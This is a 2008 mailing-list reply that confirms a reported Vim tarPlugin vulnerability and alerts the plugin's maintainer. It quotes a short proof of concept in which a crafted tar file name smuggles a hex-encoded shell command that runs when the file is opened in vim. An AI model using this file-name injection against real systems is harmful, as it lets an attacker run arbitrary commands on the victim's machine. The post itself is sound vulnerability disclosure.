On 02/07/08 02:26, Jan Minář wrote:
> Looks like this didn't go through, so here it is again:
[...]
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
> xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.

I'm seeing this too. Looks like a vulnerability to executing arbitrary
shell commands via a specially crafted "tarfile" (which can be
zero-length as here) with an unusual name. The maintainer of the suspect
script ($VIMRUNTIME/plugin/tarPlugin.vim and/or
$VIMRUNTIME/autoload/tar.vim) would be Dr. Chip; I think he's reading
these groups but I'm adding him as a Bcc just in case (Dr. Chip, sorry
if you got two copies of this post). FWIW, I'm using tarPlugin.vim v16
(date not mentioned) and tar.vim v16 (dated Jun 12, 2008) on gvim 7.2a.11.

Best regards,
Tony.
--
Bureaucrat, n.:
A person who cuts red tape sideways.
-- J. McCabe